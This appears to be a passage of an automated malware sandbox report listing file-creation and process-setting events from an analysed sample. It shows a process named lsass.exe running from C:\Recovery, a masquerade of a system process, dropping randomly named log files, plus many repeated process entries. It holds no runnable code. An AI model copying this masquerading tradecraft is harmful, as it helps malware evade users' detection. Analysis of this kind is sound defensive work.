Source: C:\Recovery\lsass.exe	File created: C:\Users\user\Desktop\oZQzjlbX.log	Jump to dropped file
Source: C:\Recovery\lsass.exe	File created: C:\Users\user\Desktop\gvHJzrMq.log	Jump to dropped file
Source: C:\Recovery\lsass.exe	File created: C:\Users\user\Desktop\icHKrlAV.log	Jump to dropped file
Source: C:\Recovery\lsass.exe	File created: C:\Users\user\Desktop\CmKYhHkf.log	Jump to dropped file
Source: C:\Recovery\lsass.exe	File created: C:\Users\user\Desktop\tIBixNUy.log	Jump to dropped file
Source: C:\Recovery\lsass.exe	File created: C:\Users\user\Desktop\ryfhxvpx.log	Jump to dropped file
Source: C:\Recovery\lsass.exe	File created: C:\Users\user\Desktop\LkfFbrxk.log	Jump to dropped file
Source: C:\Recovery\lsass.exe	File created: C:\Users\user\Desktop\phNJAZcc.log	Jump to dropped file
Source: C:\Recovery\lsass.exe	File created: C:\Users\user\Desktop\XVlEhDHN.log	Jump to dropped file
Source: C:\Recovery\lsass.exe	File created: C:\Users\user\Desktop\MhHNxrMf.log	Jump to dropped file

Source: C:\Users\user\Desktop\Qsi7IgkrWa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
